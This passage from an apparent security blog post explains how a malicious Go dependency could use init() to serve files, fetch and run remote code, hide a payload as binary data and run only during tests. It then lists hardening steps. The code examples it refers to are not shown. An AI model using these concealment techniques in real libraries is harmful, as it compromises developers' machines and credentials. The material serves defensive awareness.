Importing the lib1 above the main application will work as normal. However, it will also serve all the static files in the machine's root folder when the path /s/ is requested:

Allowing end users of the web application to access any files that your application has access to:

That is just a silly example, but again, once your dependencies go rogue, and they are guaranteed to have execution precedence, they have quite some leeway in terms of what they can do.

Ideas on implementation…

One of the great things about golang is that you don't need to package your libraries to distribute them. You import a package directly from its repository. Ultimately, what you see in someone's repository is what you get when you import it.

Therefore, any malicious code would need to conceal its intentions to avoid being caught in a simple code review — assuming that developers actually code review the entirety of their dependencies. It may also be disguised with some bad programming practices, but ultimately not making it too obvious what it actually does.

Below is three potential implementations:

1. Allowing remote behaviour changes

This example downloads a golang gist from GitHub and executes it locally:

This allows for an attacker to change the behaviour remotely and even disable it by creating a really small gist (note the r.ContentLength ).

2. Self-contained

Another approach could be having the malicious implementation embedded with the rest of code, however, stored in a different format. For example, in binary:

The contents of a above contains the implementation of the first code in binary, so it downloads the exact same gist and executes it locally. However, it makes it less obvious that we are making a web request.

Please note that the binary contents could well be the implementation of a go reverse shell, which would then mean the attacker now has a shell access to the machine that executed it.

3. Disguising execution

A serious implementation of this would be dormant and try to execute only when it actually won’t be noticed. One potential way to pass the code compilation and execution unnoticed would be to only execute this code when the developer is running their application’s tests. This will also increase the likelihood of having a go environment setup on the machine.

When you run your tests you are actually running a special compiled version of your source code, in Linux machines that executable is a temporary file which is suffixed with the extension .test . The example below runs example 2 only during test executions:

Note that this means that a developer by simply running their application tests would cause the malicious code to run.

What aggravates this scenario is that developers tend to be quite privileged in their own machines. And when they are not, nowadays there is a reasonable chance of them having:

docker installed and being on the docker’s user group, which by itself provide extremely easy privilege escalation options. cloud credentials on their machines, allowing for access to other environments.

Hiding in plain-sight…

This implementation could probably be decreased to even less lines of code and be scattered around a few files — after all, packages can have multiple init() functions and package level variable initialisations. :)

If well named and arranged precisely to mingle with the rest of the library’s code, this could potentially pass unnoticed. Remember of the power of init() which allows for this to be buried under several imports, and still this will come on top.

What could be the impact then?

In terms of what can be achieved with this, here’s a few ideas of what may happen when malicious code is executed at development machines or at your build pipelines:

Ex-filtration of SSH/GPG keys, Cloud credentials (example for dotnet with nuget packages) and etc.

Injection of malicious code in the compiled binary to spread this to other environments.

The last point assumes that the entry point could also be a dependency from a test framework, or a build tool, such as a fuzzer for example.

Once the malicious code arrives in production:

Ex-filtration of production data and credentials.

Changes in application behaviour.

Disruption of services.

And in all cases, there is always the possibility of execution of reverse shells, installation of malware, crypto-miners, ransomware and etc.

Ok, but how likely is this to happen?

It all depends on what processes you have in place. But here are a few things to consider on how the malicious code could make its way to your dependencies:

1. Security Carelessness

We tend to implicitly trust project maintainers and open source contributors to take security seriously. But there is no way to assess nor enforce their basic security hygiene/posture.

2. Disgruntled employees/contributors

Someone that left a project/company in bad terms, but still have access to key assets and credentials. An example could be an employee that left a company and left behind several projects that depend on open source projects that the employee still have access to.

3. Malicious contributors

Some people may play the long game to attain the status of maintainers, and use that to pursue dishonest ends. An example of social engineering in the open source community:

the hacker was able to take over maintainership of a popular module in the NPM ecosystem. Doing so established a bit of a history, giving the hacker the look of a real maintainer. Then, the module’s actual maintainer handed over maintenance of this package and later explained he did so because he wasn’t compensated for maintaining the module and hadn’t used it in years.

This is not the first and won't be the last example, here's another one.

Certainly there are other actors and vectors that could be considered when thread modelling this, but that should be a good start.

Recommendations

Here are a few recommendations to decrease the likelihood of this happening to you. And when it does happen, it will limit the damage.

1. Have your own criteria to select or veto dependencies

Before adding dependencies ensure they adhere a set of criteria you and your team are happy with:

Is this project well-maintained?

Are the maintainers trust-worthy and involved in multiple projects?

Does the project have security hygiene policies that are public (i.e. all contributors must use 2FA and GPG sign their commits)?

How deep are this projects dependencies? By adding this dependency, how many other dependencies will I "implicitly inherit"?

Does the dependencies of this project also pass my veto criteria?

2. Isolated Development Environment

Take a zero trust approach and run your development environment isolated from your personal machine by using VMs, containers or remote machines.

VS Code Remote extensions makes this process seamless and will also make it easier to have disposable development environments, decreasing the likelihood of a compromised application/environment from affecting others.

3. One-Time Build Pipelines

Expanding zero trust to your build pipelines, ensure that each build should have on a clean machine/container, ensuring that no persistent threat could outlive a build process and potentially contaminate other builds.

Do not share the same instance of a build machine across different applications and isolate critical processes, such as the building and packaging of your binaries to everything else, including execution of tests and the running of other third party tools.

This is extremely simple to implement nowadays with things such as Github Actions and Azure Pipelines, so no excuse to not do it.

4. Isolation at run-time

Run your application as you did not trusted it. Use containers for running them in any environment, and using the following security mechanisms to limit its capabilities.

Use zero trust network concepts and whitelist only ingress and egress that are required for the application to run.

Implement seccomp to whitelist the system calls your application use.

Implement SELinux and/or AppArmor to further whitelist the behaviour allowed by the application inside the container.

Drop all Linux Capabilities that are not required.

Run the container with --no-new-privileges and using a non-root user.

5. Managing Dependencies

A few recommendations on how to manage dependencies:

Fork projects that are not well-maintained and treat the fork as the source of truth. In this case, your application will import your fork instead of the upstream. All upstream changes should be deal with as pull requests into your fork — together with all the implications it entails.

Vendor your dependencies and version control them, this would make it easier to code review changes as part of your application development.

Always code reviews your dependencies before adding them into your project.

Closing thoughts…

Ultimately, this is not a problem exclusive to golang, it is rather a problem of implicit trust. It is the same in most development languages, although some are more easily exploitable than others.

We, developers, need to be cognisant that we are responsible for all code we add into our applications, regardless as to who actually wrote it. In the same way that code review is a good practice for our team mate's changes, the same applies to open source contribution to our dependencies — we should review them.

No mitigation will be as efficient as not depending on a malicious dependency in the first place, so take into consideration one of Golang’s proverbs:

Sometimes you don’t actually need to take a full dependency. You could instead develop the functionality yourself or simply copy part of the code — keeping the author's and license details intact of course. :)

And as a closing point, refrain from using libraries that are reckless and have unnecessary or not well-maintained dependencies, quoting Carlos Ruiz Zafón: